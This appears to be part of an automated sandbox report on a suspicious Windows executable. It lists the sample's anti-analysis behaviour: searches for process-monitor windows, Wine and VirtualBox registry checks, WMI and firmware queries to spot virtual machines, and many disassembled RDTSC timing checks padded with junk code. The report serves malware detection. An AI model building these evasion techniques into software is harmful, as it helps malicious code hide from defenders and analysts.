Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_009939A1 push es; ret	0_2_009939A2
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 0_2_0096B324 push F3B90099h; retf	0_2_0096B32A

Source: 0zBsv1tnt4.exe

Static PE information: section name: entropy: 7.97845575818733

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B28E9D second address: B28EA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FC22D01ECC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B27F46 second address: B27F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B282F2 second address: B282FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B282FA second address: B282FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B282FE second address: B28302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B285B7 second address: B285BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B285BB second address: B285C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B285C9 second address: B285DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AEh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B2C445 second address: B2C4CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 2F70E0A8h 0x0000000d and ch, FFFFFFC8h 0x00000010 mov edi, 2516EB77h 0x00000015 push 00000003h 0x00000017 call 00007FC22D01ECD1h 0x0000001c mov esi, dword ptr [ebp+122D3C3Eh] 0x00000022 pop ecx 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push esi 0x00000028 call 00007FC22D01ECC8h 0x0000002d pop esi 0x0000002e mov dword ptr [esp+04h], esi 0x00000032 add dword ptr [esp+04h], 00000018h 0x0000003a inc esi 0x0000003b push esi 0x0000003c ret 0x0000003d pop esi 0x0000003e ret 0x0000003f call 00007FC22D01ECD4h 0x00000044 mov ecx, 5B398ED9h 0x00000049 pop ecx 0x0000004a push 00000003h 0x0000004c jmp 00007FC22D01ECCAh 0x00000051 call 00007FC22D01ECC9h 0x00000056 push eax 0x00000057 push edx 0x00000058 jl 00007FC22D01ECCCh 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B2C4CF second address: B2C4D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B2C4D3 second address: B2C507 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC22D01ECCEh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 js 00007FC22D01ECC6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B2C507 second address: B2C514 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B2C514 second address: B2C53F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FC22D01ECD7h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B2C72F second address: B2C736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B2C7EF second address: B2C7F4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B3E30D second address: B3E323 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22CC1B8B1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A383 second address: B4A387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A4FF second address: B4A509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FC22CC1B8A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A509 second address: B4A554 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC22D01ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push edi 0x00000011 pop edi 0x00000012 jmp 00007FC22D01ECD8h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push ecx 0x0000001b push esi 0x0000001c pop esi 0x0000001d pop ecx 0x0000001e pushad 0x0000001f jmp 00007FC22D01ECD7h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A694 second address: B4A698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A698 second address: B4A69C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A69C second address: B4A6BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jno 00007FC22CC1B8A6h 0x0000000d jmp 00007FC22CC1B8B0h 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A6BA second address: B4A6E1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC22D01ECD7h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007FC22D01ECCFh 0x0000000f js 00007FC22D01ECD2h 0x00000015 jnl 00007FC22D01ECC6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A949 second address: B4A969 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC22CC1B8B2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FC22CC1B8A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4A969 second address: B4A96D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4AC0A second address: B4AC13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4AC13 second address: B4AC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4AC17 second address: B4AC1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4B038 second address: B4B055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22D01ECD9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4B1BE second address: B4B1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 jnp 00007FC22CC1B8BAh 0x0000000c jnp 00007FC22CC1B8ACh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4B1D2 second address: B4B1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4BBBB second address: B4BBCF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC22CC1B8AEh 0x00000008 jne 00007FC22CC1B8A6h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4BD3F second address: B4BD43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4BD43 second address: B4BD50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4BD50 second address: B4BD79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FC22D01ECCBh 0x0000000b jmp 00007FC22D01ECD6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4BE93 second address: B4BEAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push edx 0x0000000e jno 00007FC22CC1B8A6h 0x00000014 pushad 0x00000015 popad 0x00000016 pop edx 0x00000017 push eax 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4C13A second address: B4C15D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD9h 0x00000007 jg 00007FC22D01ECCCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4F6C3 second address: B4F6E3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FC22CC1B8A8h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 jnc 00007FC22CC1B8A6h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FC12 second address: B4FC3F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC22D01ECCCh 0x00000008 jnc 00007FC22D01ECC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 jmp 00007FC22D01ECD2h 0x00000017 pop eax 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c pushad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FC3F second address: B4FC45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FC45 second address: B4FC4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FC4E second address: B4FC52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4ECC8 second address: B4ECEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FC22D01ECD4h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007FC22D01ECC6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4ECEC second address: B4ECF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FDB5 second address: B4FDB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FDB9 second address: B4FDDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c jns 00007FC22CC1B8A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FDDF second address: B4FDEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FDEE second address: B4FE3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FC22CC1B8B9h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 push ebx 0x00000014 jmp 00007FC22CC1B8ACh 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FC22CC1B8B6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B4FE3B second address: B4FE3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B511FD second address: B51204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B51204 second address: B5120A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B57437 second address: B5743B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5743B second address: B57441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B57441 second address: B57471 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AEh 0x00000007 push eax 0x00000008 jl 00007FC22CC1B8A6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop eax 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jne 00007FC22CC1B8B2h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B12D99 second address: B12D9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B56C1C second address: B56C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushad 0x00000006 popad 0x00000007 jc 00007FC22CC1B8A6h 0x0000000d pop ecx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 jnl 00007FC22CC1B8A6h 0x00000019 popad 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push edx 0x0000001f pop edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B56C3C second address: B56C62 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC22D01ECCBh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC22D01ECD3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B56C62 second address: B56C7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B572E7 second address: B572EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B572EB second address: B572F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FC22CC1B8A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B572F9 second address: B572FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5949C second address: B594A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B594A2 second address: B594A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B594A6 second address: B594AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5964F second address: B59684 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007FC22D01ECD3h 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jns 00007FC22D01ECC6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B59C19 second address: B59C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B59C26 second address: B59C43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FC22D01ECD3h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B59CCD second address: B59CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B59CD3 second address: B59CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B59E87 second address: B59E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A002 second address: B5A008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B5A008 second address: B5A00C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
